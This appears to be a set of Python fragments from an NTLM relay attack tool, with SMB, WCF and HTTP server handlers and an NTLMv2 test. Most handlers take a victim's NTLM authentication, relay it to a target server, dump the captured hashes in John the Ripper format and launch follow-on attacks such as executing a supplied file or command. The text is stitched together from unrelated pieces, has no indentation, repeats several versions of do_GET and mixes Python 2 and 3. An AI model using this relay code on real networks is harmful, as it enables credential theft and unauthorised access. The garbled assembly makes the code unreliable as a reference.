auth3 = MSRPCHeader()
auth3.set_type(MSRPC_AUTH3)
auth3.set_auth_data(str(response))
self._transport.send(auth3.get_packet(), forceWriteAndx=1)
return resp # means packet is signed, if verifier is wrong it fails
def SmbSessionSetupAndX(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus=False)
#############################################################
# SMBRelay
smbData = smbServer.getConnectionData('SMBRelay', False)
#############################################################
respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)
if connData['_dialects_parameters'][
'Capabilities'] & smb.SMB.CAP_EXTENDED_SECURITY:
# Extended security. Here we deal with all SPNEGO stuff
respParameters = smb.SMBSessionSetupAndX_Extended_Response_Parameters(
)
respData = smb.SMBSessionSetupAndX_Extended_Response_Data()
sessionSetupParameters = smb.SMBSessionSetupAndX_Extended_Parameters(
SMBCommand['Parameters'])
sessionSetupData = smb.SMBSessionSetupAndX_Extended_Data()
sessionSetupData['SecurityBlobLength'] = sessionSetupParameters[
'SecurityBlobLength']
sessionSetupData.fromString(SMBCommand['Data'])
connData['Capabilities'] = sessionSetupParameters['Capabilities']
if struct.unpack(
'B', sessionSetupData['SecurityBlob'][0])[0] != ASN1_AID:
# If there no GSSAPI ID, it must be an AUTH packet
blob = SPNEGO_NegTokenResp(sessionSetupData['SecurityBlob'])
token = blob['ResponseToken']
else:
# NEGOTIATE packet
blob = SPNEGO_NegTokenInit(sessionSetupData['SecurityBlob'])
token = blob['MechToken']
# Here we only handle NTLMSSP, depending on what stage of the
# authentication we are, we act on it
messageType = struct.unpack(
'<L', token[len('NTLMSSP\x00'):len('NTLMSSP\x00') + 4])[0]
if messageType == 0x01:
# NEGOTIATE_MESSAGE
negotiateMessage = ntlm.NTLMAuthNegotiate()
negotiateMessage.fromString(token)
# Let's store it in the connection data
connData['NEGOTIATE_MESSAGE'] = negotiateMessage
#############################################################
# SMBRelay: Ok.. So we got a NEGOTIATE_MESSAGE from a client.
# Let's send it to the target server and send the answer back to the client.
client = smbData[self.target]['SMBClient']
challengeMessage = self.do_ntlm_negotiate(client, token)
#############################################################
respToken = SPNEGO_NegTokenResp()
# accept-incomplete. We want more data
respToken['NegResult'] = '\x01'
respToken['SupportedMech'] = TypesMech[
'NTLMSSP - Microsoft NTLM Security Support Provider']
respToken['ResponseToken'] = str(challengeMessage)
# Setting the packet to STATUS_MORE_PROCESSING
errorCode = STATUS_MORE_PROCESSING_REQUIRED
# Let's set up an UID for this connection and store it
# in the connection's data
# Picking a fixed value
# TODO: Manage more UIDs for the same session
connData['Uid'] = 10
# Let's store it in the connection data
connData['CHALLENGE_MESSAGE'] = challengeMessage
elif messageType == 0x03:
# AUTHENTICATE_MESSAGE, here we deal with authentication
#############################################################
# SMBRelay: Ok, so now the have the Auth token, let's send it
# back to the target system and hope for the best.
client = smbData[self.target]['SMBClient']
authenticateMessage = ntlm.NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if authenticateMessage['user_name'] != '':
#For some attacks it is important to know the authenticated username, so we store it
connData['AUTHUSER'] = authenticateMessage['user_name']
self.authUser = connData['AUTHUSER']
clientResponse, errorCode = self.do_ntlm_auth(
client, sessionSetupData['SecurityBlob'],
connData['CHALLENGE_MESSAGE']['challenge'])
#clientResponse, errorCode = smbClient.sendAuth(sessionSetupData['SecurityBlob'],connData['CHALLENGE_MESSAGE']['challenge'])
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
# Let's return what the target returned, hope the client connects back again
packet = smb.NewSMBPacket()
packet[
'Flags1'] = smb.SMB.FLAGS1_REPLY | smb.SMB.FLAGS1_PATHCASELESS
packet[
'Flags2'] = smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_EXTENDED_SECURITY
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = '\x00\x00\x00'
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
# Reset the UID
if self.target[0] == 'SMB':
client.setUid(0)
logging.error(
"Authenticating against %s as %s\%s FAILED" %
(self.target, authenticateMessage['domain_name'],
authenticateMessage['user_name']))
#Log this target as processed for this client
self.targetprocessor.log_target(connData['ClientIP'],
self.target)
#del (smbData[self.target])
return None, [packet], errorCode
else:
# We have a session, create a thread and do whatever we want
logging.info(
"Authenticating against %s as %s\%s SUCCEED" %
(self.target, authenticateMessage['domain_name'],
authenticateMessage['user_name']))
#Log this target as processed for this client
self.targetprocessor.log_target(connData['ClientIP'],
self.target)
ntlm_hash_data = outputToJohnFormat(
connData['CHALLENGE_MESSAGE']['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'],
authenticateMessage['lanman'],
authenticateMessage['ntlm'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.getJTRdumpPath() != '':
writeJohnOutputToFile(ntlm_hash_data['hash_string'],
ntlm_hash_data['hash_version'],
self.server.getJTRdumpPath())
del (smbData[self.target])
self.do_attack(client)
# Now continue with the server
#############################################################
respToken = SPNEGO_NegTokenResp()
# accept-completed
respToken['NegResult'] = '\x00'
# Status SUCCESS
errorCode = STATUS_SUCCESS
# Let's store it in the connection data
connData['AUTHENTICATE_MESSAGE'] = authenticateMessage
else:
raise Exception("Unknown NTLMSSP MessageType %d" % messageType)
respParameters['SecurityBlobLength'] = len(respToken)
respData['SecurityBlobLength'] = respParameters[
'SecurityBlobLength']
respData['SecurityBlob'] = respToken.getData()
else:
# Process Standard Security
#TODO: Fix this for other protocols than SMB [!]
respParameters = smb.SMBSessionSetupAndXResponse_Parameters()
respData = smb.SMBSessionSetupAndXResponse_Data()
sessionSetupParameters = smb.SMBSessionSetupAndX_Parameters(
SMBCommand['Parameters'])
sessionSetupData = smb.SMBSessionSetupAndX_Data()
sessionSetupData['AnsiPwdLength'] = sessionSetupParameters[
'AnsiPwdLength']
sessionSetupData['UnicodePwdLength'] = sessionSetupParameters[
'UnicodePwdLength']
sessionSetupData.fromString(SMBCommand['Data'])
connData['Capabilities'] = sessionSetupParameters['Capabilities']
#############################################################
# SMBRelay
smbClient = smbData[self.target]['SMBClient']
if sessionSetupData['Account'] != '':
#TODO: Fix this for other protocols than SMB [!]
clientResponse, errorCode = smbClient.login_standard(
sessionSetupData['Account'],
sessionSetupData['PrimaryDomain'],
sessionSetupData['AnsiPwd'],
sessionSetupData['UnicodePwd'])
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
# Let's return what the target returned, hope the client connects back again
packet = smb.NewSMBPacket()
packet[
'Flags1'] = smb.SMB.FLAGS1_REPLY | smb.SMB.FLAGS1_PATHCASELESS
packet[
'Flags2'] = smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_EXTENDED_SECURITY
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = '\x00\x00\x00'
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
# Reset the UID
smbClient.setUid(0)
#Log this target as processed for this client
self.targetprocessor.log_target(connData['ClientIP'],
self.target)
return None, [packet], errorCode
# Now continue with the server
else:
# We have a session, create a thread and do whatever we want
ntlm_hash_data = outputToJohnFormat(
'', sessionSetupData['Account'],
sessionSetupData['PrimaryDomain'],
sessionSetupData['AnsiPwd'],
sessionSetupData['UnicodePwd'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.getJTRdumpPath() != '':
writeJohnOutputToFile(ntlm_hash_data['hash_string'],
ntlm_hash_data['hash_version'],
self.server.getJTRdumpPath())
#TODO: Fix this for other protocols than SMB [!]
clientThread = self.config.attacks['SMB'](self.config,
smbClient,
self.config.exeFile,
self.config.command)
clientThread.start()
#Log this target as processed for this client
self.targetprocessor.log_target(connData['ClientIP'],
self.target)
# Remove the target server from our connection list, the work is done
del (smbData[self.target])
# Now continue with the server
#############################################################
# Do the verification here, for just now we grant access
# TODO: Manage more UIDs for the same session
errorCode = STATUS_SUCCESS
connData['Uid'] = 10
respParameters['Action'] = 0
respData['NativeOS'] = smbServer.getServerOS()
respData['NativeLanMan'] = smbServer.getServerOS()
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
# From now on, the client can ask for other commands
connData['Authenticated'] = True
#############################################################
# SMBRelay
smbServer.setConnectionData('SMBRelay', smbData)
#############################################################
smbServer.setConnectionData(connId, connData)
return [respSMBCommand], None, errorCode
def handle(self):
version_code = self.recvall(1)
if version_code != b'\x00':
LOG.error("WCF: wrong VersionRecord code")
return
version = self.recvall(2) # should be \x01\x00 but we don't care
if version != b'\x01\x00':
LOG.error("WCF: wrong VersionRecord version")
return
mode_code = self.recvall(1)
if mode_code != b'\x01':
LOG.error("WCF: wrong ModeRecord code")
return
mode = self.recvall(1) # we don't care
via_code = self.recvall(1)
if via_code != b'\x02':
LOG.error("WCF: wrong ViaRecord code")
return
via_len = self.recvall(1)
via_len = struct.unpack("B", via_len)[0]
via = self.recvall(via_len).decode("utf-8")
if not via.startswith("net.tcp://"):
LOG.error("WCF: the Via URL '" + via + "' does not start with 'net.tcp://'. "
"Only NetTcpBinding is currently supported!")
return
known_encoding_code = self.recvall(1)
if known_encoding_code != b'\x03':
LOG.error("WCF: wrong KnownEncodingRecord code")
return
encoding = self.recvall(1) # we don't care
upgrade_code = self.recvall(1)
if upgrade_code != b'\x09':
LOG.error("WCF: wrong UpgradeRequestRecord code")
return
upgrade_len = self.recvall(1)
upgrade_len = struct.unpack("B", upgrade_len)[0]
upgrade = self.recvall(upgrade_len).decode("utf-8")
if upgrade != "application/negotiate":
LOG.error("WCF: upgrade '" + upgrade + "' is not 'application/negotiate'. Only Negotiate is supported!")
return
self.request.sendall(b'\x0a')
while True:
handshake_in_progress = self.recvall(5)
if not handshake_in_progress[0] == 0x16:
LOG.error("WCF: Wrong handshake_in_progress message")
return
securityBlob_len = struct.unpack(">H", handshake_in_progress[3:5])[0]
securityBlob = self.recvall(securityBlob_len)
rawNTLM = False
if struct.unpack('B', securityBlob[0:1])[0] == ASN1_AID:
# SPNEGO NEGOTIATE packet
blob = SPNEGO_NegTokenInit(securityBlob)
token = blob['MechToken']
if len(blob['MechTypes'][0]) > 0:
# Is this GSSAPI NTLM or something else we don't support?
mechType = blob['MechTypes'][0]
if mechType != TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider'] and \
mechType != TypesMech['NEGOEX - SPNEGO Extended Negotiation Security Mechanism']:
# Nope, do we know it?
if mechType in MechTypes:
mechStr = MechTypes[mechType]
else:
mechStr = hexlify(mechType)
LOG.error("Unsupported MechType '%s'" % mechStr)
# We don't know the token, we answer back again saying
# we just support NTLM.
respToken = SPNEGO_NegTokenResp()
respToken['NegState'] = b'\x03' # request-mic
respToken['SupportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
respToken = respToken.getData()
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nns/3e77f3ac-db7e-4c76-95de-911dd280947b
answer = b'\x16' # handshake_in_progress
answer += b'\x01\x00' # version
answer += struct.pack(">H", len(respToken)) # len
answer += respToken
self.request.sendall(answer)
elif struct.unpack('B', securityBlob[0:1])[0] == ASN1_SUPPORTED_MECH:
# SPNEGO AUTH packet
blob = SPNEGO_NegTokenResp(securityBlob)
token = blob['ResponseToken']
break
else:
# No GSSAPI stuff, raw NTLMSSP
rawNTLM = True
token = securityBlob
break
if not token.startswith(b"NTLMSSP\0\1"): # NTLMSSP_NEGOTIATE: message type 1
LOG.error("WCF: Wrong NTLMSSP_NEGOTIATE message")
return
if not self.do_ntlm_negotiate(token):
# Connection failed
LOG.error('Negotiating NTLM with %s://%s failed. Skipping to next target',
self.target.scheme, self.target.netloc)
self.server.config.target.logTarget(self.target)
return
# Calculate auth
ntlmssp_challenge = self.challengeMessage.getData()
if not rawNTLM:
# add SPNEGO wrapping
respToken = SPNEGO_NegTokenResp()
# accept-incomplete. We want more data
respToken['NegState'] = b'\x01'
respToken['SupportedMech'] = TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
respToken['ResponseToken'] = ntlmssp_challenge
ntlmssp_challenge = respToken.getData()
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nns/3e77f3ac-db7e-4c76-95de-911dd280947b
handshake_in_progress = b"\x16\x01\x00" + struct.pack(">H", len(ntlmssp_challenge))
self.request.sendall(handshake_in_progress)
self.request.sendall(ntlmssp_challenge)
handshake_done = self.recvall(5)
if handshake_done[0] == 0x15:
error_len = struct.unpack(">H", handshake_done[3:5])[0]
error_msg = self.recvall(error_len)
hresult = hex(struct.unpack('>I', error_msg[4:8])[0])
LOG.error("WCF: Received handshake_error message: " + hresult)
return
ntlmssp_auth_len = struct.unpack(">H", handshake_done[3:5])[0]
ntlmssp_auth = self.recvall(ntlmssp_auth_len)
if not rawNTLM:
# remove SPNEGO wrapping
blob = SPNEGO_NegTokenResp(ntlmssp_auth)
ntlmssp_auth = blob['ResponseToken']
if not ntlmssp_auth.startswith(b"NTLMSSP\0\3"): # NTLMSSP_AUTH: message type 3
LOG.error("WCF: Wrong NTLMSSP_AUTH message")
return
authenticateMessage = ntlm.NTLMAuthChallengeResponse()
authenticateMessage.fromString(ntlmssp_auth)
if not self.do_ntlm_auth(ntlmssp_auth, authenticateMessage):
if authenticateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_UNICODE:
LOG.error("Authenticating against %s://%s as %s\\%s FAILED" % (
self.target.scheme, self.target.netloc,
authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le')))
else:
LOG.error("Authenticating against %s://%s as %s\\%s FAILED" % (
self.target.scheme, self.target.netloc,
authenticateMessage['domain_name'].decode('ascii'),
authenticateMessage['user_name'].decode('ascii')))
return
# Relay worked, do whatever we want here...
if authenticateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_UNICODE:
LOG.info("Authenticating against %s://%s as %s\\%s SUCCEED" % (
self.target.scheme, self.target.netloc,
authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le')))
else:
LOG.info("Authenticating against %s://%s as %s\\%s SUCCEED" % (
self.target.scheme, self.target.netloc, authenticateMessage['domain_name'].decode('ascii'),
authenticateMessage['user_name'].decode('ascii')))
ntlm_hash_data = outputToJohnFormat(self.challengeMessage['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'],
authenticateMessage['lanman'], authenticateMessage['ntlm'])
self.client.sessionData['JOHN_OUTPUT'] = ntlm_hash_data
if self.server.config.outputFile is not None:
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.config.outputFile)
self.server.config.target.logTarget(self.target, True, self.authUser)
self.do_attack()
def test_ntlmv2(self):
print("####### 4.2.4 NTLMv2 Authentication")
ntlm.USE_NTLMv2 = True
serverName = b(
'\x02\x00\x0c\x00\x44\x00\x6f\x00\x6d\x00\x61\x00\x69\x00\x6e\x00\x01\x00\x0c\x00\x53\x00\x65\x00\x72\x00\x76\x00\x65\x00\x72\x00\x00\x00\x00\x00'
)
# Still the aTime won't be set to zero. that must be changed in ntlm.computeResponseNTLM2. Gotta make this more automated
flags = ntlm.NTLMSSP_NEGOTIATE_KEY_EXCH | ntlm.NTLMSSP_NEGOTIATE_56 | ntlm.NTLMSSP_NEGOTIATE_128 | \
ntlm.NTLMSSP_NEGOTIATE_VERSION | ntlm.NTLMSSP_NEGOTIATE_TARGET_INFO | \
ntlm.NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY | ntlm.NTLMSSP_TARGET_TYPE_SERVER | \
ntlm.NTLMSSP_NEGOTIATE_ALWAYS_SIGN | ntlm.NTLMSSP_NEGOTIATE_NTLM | ntlm.NTLMSSP_NEGOTIATE_SEAL | \
ntlm.NTLMSSP_NEGOTIATE_SIGN | ntlm.NTLM_NEGOTIATE_OEM | ntlm.NTLMSSP_NEGOTIATE_UNICODE
print("Flags")
hexdump(struct.pack('<L', flags))
print("\n")
print("4.2.4.1.1 NTOWFv2 and LMOWFv2")
res = ntlm.NTOWFv2(self.user, self.password, self.domain)
hexdump(res)
self.assertTrue(res == bytearray(
b'\x0c\x86\x8a@;\xfdz\x93\xa3\x00\x1e\xf2.\xf0.?'))
print("\n")
print("\n")
print("4.2.4.1.2 Session Base Key")
ntResponse, lmResponse, sessionBaseKey = ntlm.computeResponseNTLMv2(
flags, self.serverChallenge, self.clientChallenge, serverName,
self.domain, self.user, self.password, '', '')
hexdump(sessionBaseKey)
self.assertTrue(sessionBaseKey == bytearray(
b'\x8d\xe4\x0c\xca\xdb\xc1\x4a\x82\xf1\x5c\xb0\xad\x0d\xe9\x5c\xa3'
))
print("\n")
print("4.2.4.2.1 LMv2 Response")
hexdump(lmResponse)
self.assertTrue(lmResponse == bytearray(
b'\x86\xc3P\x97\xac\x9c\xec\x10%TvJW\xcc\xcc\x19\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa'
))
print("\n")
print("4.2.4.2.2 NTLMv2 Response")
hexdump(ntResponse[:16])
self.assertTrue(ntResponse[:16] == bytearray(
b'\x68\xcd\x0a\xb8\x51\xe5\x1c\x96\xaa\xbc\x92\x7b\xeb\xef\x6a\x1c'
))
print("\n")
print("4.2.4.2.3 Encrypted Session Key")
keyExchangeKey = ntlm.KXKEY(flags, sessionBaseKey, lmResponse,
self.serverChallenge, self.password, '',
'')
encryptedSessionKey = ntlm.generateEncryptedSessionKey(
keyExchangeKey, self.randomSessionKey)
hexdump(encryptedSessionKey)
self.assertTrue(encryptedSessionKey == bytearray(
b'\xC5\xDA\xD2\x54\x4F\xC9\x79\x90\x94\xCE\x1C\xE9\x0B\xC9\xD0\x3E'
))
print("\n")
print("AUTHENTICATE MESSAGE")
encryptedSessionKey = ntlm.generateEncryptedSessionKey(
keyExchangeKey, self.randomSessionKey)
ntlmChallengeResponse = ntlm.NTLMAuthChallengeResponse(
self.user, self.password, self.serverChallenge)
ntlmChallengeResponse['flags'] = flags
ntlmChallengeResponse['host_name'] = self.workstationName.encode(
'utf-16le')
ntlmChallengeResponse['domain_name'] = self.domain.encode('utf-16le')
ntlmChallengeResponse['lanman'] = lmResponse
ntlmChallengeResponse['ntlm'] = ntResponse
ntlmChallengeResponse['session_key'] = encryptedSessionKey
hexdump(ntlmChallengeResponse.getData())
self.assertTrue(ntlmChallengeResponse.getData() == bytearray(
b'NTLMSSP\x00\x03\x00\x00\x00\x18\x00\x18\x00|\x00\x00\x00T\x00T\x00\x94\x00\x00\x00\x0c\x00\x0c\x00X\x00\x00\x00\x08\x00\x08\x00d\x00\x00\x00\x10\x00\x10\x00l\x00\x00\x00\x10\x00\x10\x00\xe8\x00\x00\x003\x82\x8a\xe2D\x00o\x00m\x00a\x00i\x00n\x00U\x00s\x00e\x00r\x00C\x00O\x00M\x00P\x00U\x00T\x00E\x00R\x00\x86\xc3P\x97\xac\x9c\xec\x10%TvJW\xcc\xcc\x19\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaah\xcd\n\xb8Q\xe5\x1c\x96\xaa\xbc\x92{\xeb\xefj\x1c\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\x00\x00\x00\x00\x02\x00\x0c\x00D\x00o\x00m\x00a\x00i\x00n\x00\x01\x00\x0c\x00S\x00e\x00r\x00v\x00e\x00r\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc5\xda\xd2TO\xc9y\x90\x94\xce\x1c\xe9\x0b\xc9\xd0>'
))
print("\n")
print("4.2.4.4 GSS_WrapEx")
print("Plaintext")
hexdump(self.plaintext)
print("\n")
print("Output of SEAL()")
exportedSessionKey = self.randomSessionKey
clientSigningKey = ntlm.SIGNKEY(flags, exportedSessionKey)
clientSealingKey = ntlm.SEALKEY(flags, exportedSessionKey)
from Cryptodome.Cipher import ARC4
cipher2 = ARC4.new(clientSealingKey)
client_sealing_h = cipher2.encrypt
print("SEALKEY()")
hexdump(clientSealingKey)
self.assertTrue(clientSealingKey == bytearray(
b'Y\xf6\x00\x97<\xc4\x96\n%H\n|\x19nLX'))
print("\n")
print("SIGNKEY()")
hexdump(clientSigningKey)
self.assertTrue(clientSigningKey == bytearray(
b'G\x88\xdc\x86\x1bG\x82\xf3]C\xfd\x98\xfe\x1a-9'))
print("\n")
print("Sealed Data")
sealedMsg, signature = ntlm.SEAL(flags, clientSealingKey,
clientSigningKey, self.plaintext,
self.plaintext, self.seqNum,
client_sealing_h)
#signature = ntlm.SIGN(flags, clientSigningKey, plaintext, seqNum, client_sealing_h)
hexdump(sealedMsg)
self.assertTrue(sealedMsg == bytearray(
b'T\xe5\x01e\xbf\x196\xdc\x99` \xc1\x81\x1b\x0f\x06\xfb_'))
print("\n")
print("Signature")
hexdump(signature.getData())
self.assertTrue(signature.getData() == bytearray(
b'\x01\x00\x00\x00\x00\xc1a\xa1\x1e@\x03\x9f\x00\x00\x00\x00'))
#print (repr(bytearray(str(signature))))
#raise
print("\n")
class HTTPHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def __init__(self,request, client_address, server):
self.server = server
self.protocol_version = 'HTTP/1.1'
print "[*] HTTPD: Received connection from %s, attacking target %s" % (client_address[0] ,self.server.target)
SimpleHTTPServer.SimpleHTTPRequestHandler.__init__(self,request, client_address, server)
def handle_one_request(self):
try:
SimpleHTTPServer.SimpleHTTPRequestHandler.handle_one_request(self)
except:
pass
def log_message(self, format, *args):
return
def do_HEAD(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_AUTHHEAD(self, message = ''):
self.send_response(401)
self.send_header('WWW-Authenticate', message)
self.send_header('Content-type', 'text/html')
self.send_header('Content-Length','0')
self.end_headers()
def do_GET(self):
messageType = 0
if self.headers.getheader('Authorization') == None:
self.do_AUTHHEAD(message = 'NTLM')
pass
else:
#self.do_AUTHHEAD()
typeX = self.headers.getheader('Authorization')
try:
_, blob = typeX.split('NTLM')
token = base64.b64decode(blob.strip())
except:
self.do_AUTHHEAD()
messageType = struct.unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
if messageType == 1:
if self.server.mode.upper() == 'REFLECTION':
self.target = self.client_address[0]
print "[*] Downgrading to standard security"
extSec = False
else:
self.target = self.server.target
extSec = True
try:
self.client = SMBClient(self.target, extended_security = True)
self.client.set_timeout(60)
except Exception, e:
print "[!] Connection against target %s FAILED" % self.target
print e
clientChallengeMessage = self.client.sendNegotiate(token)
self.do_AUTHHEAD(message = 'NTLM '+base64.b64encode(clientChallengeMessage))
elif messageType == 3:
authenticateMessage = ntlm.NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if authenticateMessage['user_name'] != '':
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = str(token)
clientResponse, errorCode = self.client.sendAuth(respToken2.getData())
else:
# Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
errorCode = STATUS_ACCESS_DENIED
if errorCode != STATUS_SUCCESS:
print "[!] Authenticating against %s as %s\%s FAILED" % (self.target,authenticateMessage['domain_name'], authenticateMessage['user_name'])
self.do_AUTHHEAD('NTLM')
else:
# Relay worked, do whatever we want here...
print "[*] Authenticating against %s as %s\%s SUCCEED" % (self.target,authenticateMessage['domain_name'], authenticateMessage['user_name'])
clientThread = doAttack(self.client,self.server.exeFile)
clientThread.start()
# And answer 404 not found
self.send_response(404)
self.send_header('WWW-Authenticate', 'NTLM')
self.send_header('Content-type', 'text/html')
self.send_header('Content-Length','0')
self.end_headers()
def do_GET(self):
messageType = 0
if self.server.config.mode == 'REDIRECT':
self.do_SMBREDIRECT()
return
LOG.info('HTTPD: Client requested path: %s' % self.path.lower())
# Serve WPAD if:
# - The client requests it
# - A WPAD host was provided in the command line options
# - The client has not exceeded the wpad_auth_num threshold yet
if self.path.lower(
) == '/wpad.dat' and self.server.config.serve_wpad and self.should_serve_wpad(
self.client_address[0]):
LOG.info('HTTPD: Serving PAC file to client %s' %
self.client_address[0])
self.serve_wpad()
return
# Determine if the user is connecting to our server directly or attempts to use it as a proxy
if self.command == 'CONNECT' or (len(self.path) > 4 and
self.path[:4].lower() == 'http'):
proxy = True
else:
proxy = False
if (proxy and self.headers.getheader('Proxy-Authorization') is None
) or (not proxy
and self.headers.getheader('Authorization') is None):
self.do_AUTHHEAD(message='NTLM', proxy=proxy)
pass
else:
if proxy:
typeX = self.headers.getheader('Proxy-Authorization')
else:
typeX = self.headers.getheader('Authorization')
try:
_, blob = typeX.split('NTLM')
token = base64.b64decode(blob.strip())
except:
self.do_AUTHHEAD(message='NTLM', proxy=proxy)
else:
messageType = struct.unpack(
'<L',
token[len('NTLMSSP\x00'):len('NTLMSSP\x00') + 4])[0]
if messageType == 1:
if not self.do_ntlm_negotiate(token, proxy=proxy):
#Connection failed
LOG.error(
'Negotiating NTLM with %s://%s failed. Skipping to next target',
self.target.scheme, self.target.netloc)
self.server.config.target.logTarget(self.target)
self.do_REDIRECT()
elif messageType == 3:
authenticateMessage = ntlm.NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if not self.do_ntlm_auth(token, authenticateMessage):
if authenticateMessage[
'flags'] & ntlm.NTLMSSP_NEGOTIATE_UNICODE:
LOG.error(
"Authenticating against %s://%s as %s\%s FAILED" %
(self.target.scheme, self.target.netloc,
authenticateMessage['domain_name'].decode(
'utf-16le'), authenticateMessage['user_name'].
decode('utf-16le')))
else:
LOG.error(
"Authenticating against %s://%s as %s\%s FAILED" %
(self.target.scheme, self.target.netloc,
authenticateMessage['domain_name'].decode(
'ascii'),
authenticateMessage['user_name'].decode('ascii')))
# Only skip to next if the login actually failed, not if it was just anonymous login or a system account which we don't want
if authenticateMessage[
'user_name'] != '': # and authenticateMessage['user_name'][-1] != '$':
self.server.config.target.logTarget(self.target)
# No anonymous login, go to next host and avoid triggering a popup
self.do_REDIRECT()
else:
#If it was an anonymous login, send 401
self.do_AUTHHEAD('NTLM', proxy=proxy)
else:
# Relay worked, do whatever we want here...
if authenticateMessage[
'flags'] & ntlm.NTLMSSP_NEGOTIATE_UNICODE:
LOG.info(
"Authenticating against %s://%s as %s\%s SUCCEED" %
(self.target.scheme, self.target.netloc,
authenticateMessage['domain_name'].decode(
'utf-16le'), authenticateMessage['user_name'].
decode('utf-16le')))
else:
LOG.info(
"Authenticating against %s://%s as %s\%s SUCCEED" %
(self.target.scheme, self.target.netloc,
authenticateMessage['domain_name'].decode(
'ascii'),
authenticateMessage['user_name'].decode('ascii')))
ntlm_hash_data = outputToJohnFormat(
self.challengeMessage['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'],
authenticateMessage['lanman'],
authenticateMessage['ntlm'])
self.client.sessionData['JOHN_OUTPUT'] = ntlm_hash_data
if self.server.config.outputFile is not None:
writeJohnOutputToFile(ntlm_hash_data['hash_string'],
ntlm_hash_data['hash_version'],
self.server.config.outputFile)
self.server.config.target.logTarget(self.target)
self.do_attack()
# And answer 404 not found
self.send_response(404)
self.send_header('WWW-Authenticate', 'NTLM')
self.send_header('Content-type', 'text/html')
self.send_header('Content-Length', '0')
self.send_header('Connection', 'close')
self.end_headers()
return
def do_GET(self):
messageType = 0
if self.headers.getheader('Authorization') is None:
self.do_AUTHHEAD(message='NTLM')
pass
else:
typeX = self.headers.getheader('Authorization')
try:
_, blob = typeX.split('NTLM')
token = base64.b64decode(blob.strip())
except:
self.do_AUTHHEAD()
messageType = struct.unpack(
'<L', token[len('NTLMSSP\x00'):len('NTLMSSP\x00') + 4])[0]
if messageType == 1:
if not self.do_ntlm_negotiate(token):
#Connection failed
self.server.config.target.log_target(
self.client_address[0], self.target)
self.do_REDIRECT()
elif messageType == 3:
authenticateMessage = ntlm.NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if not self.do_ntlm_auth(token, authenticateMessage):
logging.error(
"Authenticating against %s as %s\%s FAILED" %
(self.target[1], authenticateMessage['domain_name'],
authenticateMessage['user_name']))
#Only skip to next if the login actually failed, not if it was just anonymous login or a system account which we don't want
if authenticateMessage[
'user_name'] != '': # and authenticateMessage['user_name'][-1] != '$':
self.server.config.target.log_target(
self.client_address[0], self.target)
#No anonymous login, go to next host and avoid triggering a popup
self.do_REDIRECT()
else:
#If it was an anonymous login, send 401
self.do_AUTHHEAD('NTLM')
else:
# Relay worked, do whatever we want here...
logging.info(
"Authenticating against %s as %s\%s SUCCEED" %
(self.target[1], authenticateMessage['domain_name'],
authenticateMessage['user_name']))
ntlm_hash_data = outputToJohnFormat(
self.challengeMessage['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'],
authenticateMessage['lanman'],
authenticateMessage['ntlm'])
logging.info(ntlm_hash_data['hash_string'])
if self.server.config.outputFile is not None:
writeJohnOutputToFile(ntlm_hash_data['hash_string'],
ntlm_hash_data['hash_version'],
self.server.config.outputFile)
self.server.config.target.log_target(
self.client_address[0], self.target)
self.do_attack()
# And answer 404 not found
self.send_response(404)
self.send_header('WWW-Authenticate', 'NTLM')
self.send_header('Content-type', 'text/html')
self.send_header('Content-Length', '0')
self.send_header('Connection', 'close')
self.end_headers()
return
